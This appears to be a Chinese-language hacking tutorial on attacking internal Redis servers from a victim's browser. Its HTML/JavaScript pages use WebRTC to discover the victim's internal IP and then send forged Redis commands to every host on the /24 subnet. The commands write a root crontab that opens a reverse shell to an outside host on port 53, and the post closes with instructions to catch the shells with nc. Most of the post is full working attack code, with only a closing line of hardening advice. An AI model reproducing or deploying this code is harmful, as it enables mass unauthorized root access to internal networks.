参考http://www.freebuf.com/articles/web/103097.html
他这个是攻击web应用的,今天实现的是利用xss或者社工让对方点我的链接,然后利用js自动化攻击内网redis,
利用redis写任务计划批量反弹shell。
js扫内网6379不太好实现,就不进行端口探测了,直接对整个网段执行一遍exp
利用如下代码获取内网ip段:- <!DOCTYPE html>
- <html lang="en">
- <head>
- <meta charset="UTF-8" />
- <title>Document</title>
- </head>
- <body>
-
- </body>
- <script>
- ipList = []
- var webrtcxss = {
- webrtc : function(callback){
- var ip_dups = {};
- var RTCPeerConnection = window.RTCPeerConnection || window.mozRTCPeerConnection || window.webkitRTCPeerConnection;
- var mediaConstraints = {
- optional: [{RtpDataChannels: true}]
- };
- var servers = undefined;
- if(window.webkitRTCPeerConnection){
- servers = {iceServers: []};
- }
- var pc = new RTCPeerConnection(servers, mediaConstraints);
- pc.onicecandidate = function(ice){
- if(ice.candidate){
- var ip_regex = /([0-9]{1,3}(\.[0-9]{1,3}){3})/;
- var ip_addr = ip_regex.exec(ice.candidate.candidate)[1];
- if(ip_dups[ip_addr] === undefined)
- callback(ip_addr);
- ip_dups[ip_addr] = true;
- }
- };
- pc.createDataChannel("");
- pc.createOffer(function(result){
- pc.setLocalDescription(result, function(){});
- });
- },
- getIp : function(){
- this.webrtc(function(ip){
- ipList.push(ip);
- });
- }
- }
- webrtcxss.getIp()
- setTimeout(function() {
- alert(ipList)
- }, 300)
- </script>
- </html>
复制代码
效果如下图
利用ajax攻击redis原理: 参考文章:http://benmmurphy.github.io/blog ... lua-sandbox-escape/ http://www.freebuf.com/articles/web/19622.html 跨域是发出数据包获取不到返回包,这里我们只管发出去不管返回,所以也不用担心跨域的问题。 下面是一个ajax操作redis写任务计划反弹的例子: - var ip = '192.168.203.2';
- var port= '6379';
- var dir = '/var/spool/cron/';
- var filename = 'root';
- var content = '*/1 * * * * /bin/bash -i >& /dev/tcp/www.chinabaiker.com/53 0>&1';
- var url = "http://" + ip + ":" + port;
- var cmd = new XMLHttpRequest();
- cmd.open("POST", url);
- cmd.send('eval \'' + 'redis.call("set", "hacked", "\\r\\n\\n'+content+'\\n\\n\\n\\n"); redis.call("config", "set", "dir", "' + dir + '/"); redis.call("config", "set", "dbfilename", "'+filename+'"); ' + '\' 0' + "\r\n");
-
- var cmd = new XMLHttpRequest();
- cmd.open("POST", url);
- cmd.send('save\r\n');
复制代码最后来实现自动获取内网ip,自动批量攻击内网1-255的ip - <!DOCTYPE html>
- <html lang="en">
- <head>
- <meta charset="UTF-8" />
- <title>Document</title>
- </head>
- <body>
-
- </body>
- <script>
- ipList = []
- var webrtcxss = {
- webrtc : function(callback){
- var ip_dups = {};
- var RTCPeerConnection = window.RTCPeerConnection || window.mozRTCPeerConnection || window.webkitRTCPeerConnection;
- var mediaConstraints = {
- optional: [{RtpDataChannels: true}]
- };
- var servers = undefined;
- if(window.webkitRTCPeerConnection){
- servers = {iceServers: []};
- }
- var pc = new RTCPeerConnection(servers, mediaConstraints);
- pc.onicecandidate = function(ice){
- if(ice.candidate){
- var ip_regex = /([0-9]{1,3}(\.[0-9]{1,3}){3})/;
- var ip_addr = ip_regex.exec(ice.candidate.candidate)[1];
- if(ip_dups[ip_addr] === undefined)
- callback(ip_addr);
- ip_dups[ip_addr] = true;
- }
- };
- pc.createDataChannel("");
- pc.createOffer(function(result){
- pc.setLocalDescription(result, function(){});
- });
- },
- getIp : function(){
- this.webrtc(function(ip){
- ipList.push(ip);
- });
- }
- }
- webrtcxss.getIp()
- setTimeout(function() {
- for(var i in ipList) {
- if(ipList[i]) {
- var iparr = ipList[i].split(".");
- for(var i=0;i<255;i++) {
- var attkip = iparr [0] + "." + iparr [1] + "." + iparr [2] + "." + i;
- send(attkip);
- }
- }
- }
- }, 300);
- function send(ip) {
- var port= '6379';
- var dir = '/var/spool/cron/';
- var filename = 'root';
- var content = '*/1 * * * * /bin/bash -i >& /dev/tcp/www.chinabaiker.com/53 0>&1';
- var url = "http://" + ip + ":" + port;
- var cmd = new XMLHttpRequest();
- cmd.open("POST", url);
- cmd.send('eval \'' + 'redis.call("set", "hacked", "\\r\\n\\n'+content+'\\n\\n\\n\\n"); redis.call("config", "set", "dir", "' + dir + '/"); redis.call("config", "set", "dbfilename", "'+filename+'"); ' + '\' 0' + "\r\n");
-
- var cmd = new XMLHttpRequest();
- cmd.open("POST", url);
- cmd.send('save\r\n');
-
- }
- </script>
- </html>
复制代码如果嫌1-255不够可以再加一个for循环
自动向内网redis发送攻击代码 然后在自己的服务器中用nc监听你设置的端口,然后你会发现服务器已经躺在这了
redis太不安全了,就算绑定127.0.0.1也不安全..最好升级最新版,然后设个密码
|